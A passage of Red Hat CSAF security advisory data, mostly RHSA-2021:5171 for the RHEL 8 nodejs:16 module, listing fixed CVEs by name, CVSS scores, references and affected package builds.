"7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3281" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs-tar: Insufficient absolute path sanitization allowing arbitrary file creation and overwrite" } ] }
rhsa-2021_5171
Vulnerability from csaf_redhat
Published
2021-12-16 17:21
Modified
2024-11-13 23:38
Summary
Red Hat Security Advisory: nodejs:16 security, bug fix, and enhancement update
Notes
Topic
An update for the nodejs:16 module is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.
The following packages have been upgraded to a later upstream version: nodejs (16.13.1), nodejs-nodemon (2.0.15). (BZ#2027610)
Security Fix(es):
* nodejs-json-schema: Prototype pollution vulnerability (CVE-2021-3918)
* nodejs-ini: Prototype pollution via malicious INI file (CVE-2020-7788)
* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)
* nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes (CVE-2021-3807)
* normalize-url: ReDoS for data URLs (CVE-2021-33502)
* llhttp: HTTP Request Smuggling due to spaces in headers (CVE-2021-22959)
* llhttp: HTTP Request Smuggling when parsing the body of chunked requests (CVE-2021-22960)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ "document": { "aggregate_severity": { "namespace": "https://access.redhat.com/security/updates/classification/", "text": "Moderate" }, "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.", "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en", "notes": [ { "category": "summary", "text": "An update for the nodejs:16 module is now available for Red Hat Enterprise Linux 8.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", "title": "Topic" }, { "category": "general", "text": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (16.13.1), nodejs-nodemon (2.0.15). (BZ#2027610)\n\nSecurity Fix(es):\n\n* nodejs-json-schema: Prototype pollution vulnerability (CVE-2021-3918)\n\n* nodejs-ini: Prototype pollution via malicious INI file (CVE-2020-7788)\n\n* nodejs-glob-parent: Regular expression denial of service (CVE-2020-28469)\n\n* nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes (CVE-2021-3807)\n\n* normalize-url: ReDoS for data URLs (CVE-2021-33502)\n\n* llhttp: HTTP Request Smuggling due to spaces in headers (CVE-2021-22959)\n\n* llhttp: HTTP Request Smuggling when parsing the body of chunked requests (CVE-2021-22960)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "title": "Details" }, { "category": "legal_disclaimer", "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", "title": "Terms of Use" } ], "publisher": { "category": "vendor", "contact_details": "https://access.redhat.com/security/team/contact/", "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", "name": "Red Hat Product Security", "namespace": "https://www.redhat.com" }, "references": [ { "category": "self", "summary": "https://access.redhat.com/errata/RHSA-2021:5171", "url": "https://access.redhat.com/errata/RHSA-2021:5171" }, { "category": "external", "summary": "https://access.redhat.com/security/updates/classification/#moderate", "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "category": "external", "summary": "1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "1945459", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1945459" }, { "category": "external", "summary": "1964461", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1964461" }, { "category": "external", "summary": "2007557", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2007557" }, { "category": "external", "summary": "2014057", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2014057" }, { "category": "external", "summary": "2014059", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2014059" }, { "category": "external", "summary": "2024702", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2024702" }, { "category": "self", "summary": "Canonical URL", "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5171.json" } ], "title": "Red Hat Security Advisory: nodejs:16 security, bug fix, and enhancement update", "tracking": { "current_release_date": "2024-11-13T23:38:09+00:00", "generator": { "date": "2024-11-13T23:38:09+00:00", "engine": { "name": "Red Hat SDEngine", "version": "4.2.0" } }, "id": "RHSA-2021:5171", "initial_release_date": "2021-12-16T17:21:31+00:00", "revision_history": [ { "date": "2021-12-16T17:21:31+00:00", "number": "1", "summary": "Initial version" }, { "date": "2021-12-16T17:21:31+00:00", "number": "2", "summary": "Last updated version" }, { "date": "2024-11-13T23:38:09+00:00", "number": "3", "summary": "Last generated version" } ], "status": "final", "version": "3" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_name", "name": "Red Hat Enterprise Linux AppStream (v. 8)", "product": { "name": "Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN", "product_identification_helper": { "cpe": "cpe:/a:redhat:enterprise_linux:8::appstream" } } } ], "category": "product_family", "name": "Red Hat Enterprise Linux" }, { "branches": [ { "category": "product_version", "name": "nodejs:16:8050020211206113934:c5368500", "product": { "name": "nodejs:16:8050020211206113934:c5368500", "product_id": "nodejs:16:8050020211206113934:c5368500", "product_identification_helper": { "purl": "pkg:rpmmod/redhat/nodejs@16:8050020211206113934:c5368500" } } }, { "category": "product_version", "name": "nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "product": { "name": "nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "product_id": "nodejs-docs-1:16.13.1-3.module+el8.5.0+13548+45d748af.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-docs@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=noarch\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "product": { "name": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "product_id": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@2.0.15-1.module%2Bel8.5.0%2B13548%2B45d748af?arch=noarch" } } }, { "category": "product_version", "name": "nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "product": { "name": "nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "product_id": "nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.noarch", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-packaging@25-1.module%2Bel8.5.0%2B10992%2Bfac5fe06?arch=noarch" } } } ], "category": "architecture", "name": "noarch" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product": { "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product_id": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product": { "name": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product_id": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product": { "name": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product_id": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product": { "name": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product_id": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product": { "name": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product_id": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=s390x\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "product": { "name": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "product_id": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.s390x", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@8.1.2-1.16.13.1.3.module%2Bel8.5.0%2B13548%2B45d748af?arch=s390x\u0026epoch=1" } } } ], "category": "architecture", "name": "s390x" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "product": { "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "product_id": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=src\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "product": { "name": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "product_id": "nodejs-nodemon-0:2.0.15-1.module+el8.5.0+13548+45d748af.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-nodemon@2.0.15-1.module%2Bel8.5.0%2B13548%2B45d748af?arch=src" } } }, { "category": "product_version", "name": "nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "product": { "name": "nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "product_id": "nodejs-packaging-0:25-1.module+el8.5.0+10992+fac5fe06.src", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-packaging@25-1.module%2Bel8.5.0%2B10992%2Bfac5fe06?arch=src" } } } ], "category": "architecture", "name": "src" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product": { "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product_id": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product": { "name": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product_id": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product": { "name": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product_id": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product": { "name": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product_id": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product": { "name": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product_id": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=x86_64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64", "product": { "name": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64", "product_id": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.x86_64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@8.1.2-1.16.13.1.3.module%2Bel8.5.0%2B13548%2B45d748af?arch=x86_64\u0026epoch=1" } } } ], "category": "architecture", "name": "x86_64" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product": { "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product_id": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product": { "name": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product_id": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product": { "name": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product_id": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product": { "name": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product_id": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product": { "name": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product_id": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=aarch64\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "product": { "name": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "product_id": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.aarch64", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@8.1.2-1.16.13.1.3.module%2Bel8.5.0%2B13548%2B45d748af?arch=aarch64\u0026epoch=1" } } } ], "category": "architecture", "name": "aarch64" }, { "branches": [ { "category": "product_version", "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product": { "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product_id": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product": { "name": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product_id": "nodejs-debuginfo-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debuginfo@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product": { "name": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product_id": "nodejs-debugsource-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-debugsource@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product": { "name": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product_id": "nodejs-devel-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-devel@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product": { "name": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product_id": "nodejs-full-i18n-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/nodejs-full-i18n@16.13.1-3.module%2Bel8.5.0%2B13548%2B45d748af?arch=ppc64le\u0026epoch=1" } } }, { "category": "product_version", "name": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "product": { "name": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "product_id": "npm-1:8.1.2-1.16.13.1.3.module+el8.5.0+13548+45d748af.ppc64le", "product_identification_helper": { "purl": "pkg:rpm/redhat/npm@8.1.2-1.16.13.1.3.module%2Bel8.5.0%2B13548%2B45d748af?arch=ppc64le\u0026epoch=1" } } } ], "category": "architecture", "name": "ppc64le" } ], "category": "vendor", "name": "Red Hat" } ], "relationships": [ { "category": "default_component_of", "full_product_name": { "name": "nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, "product_reference": "nodejs:16:8050020211206113934:c5368500", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64 as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red Hat Enterprise Linux AppStream (v. 8)", "product_id": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500:nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64" }, "product_reference": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.aarch64", "relates_to_product_reference": "AppStream-8.5.0.Z.MAIN:nodejs:16:8050020211206113934:c5368500" }, { "category": "default_component_of", "full_product_name": { "name": "nodejs-1:16.13.1-3.module+el8.5.0+13548+45d748af.ppc64le as a component of nodejs:16:8050020211206113934:c5368500 as a component of Red 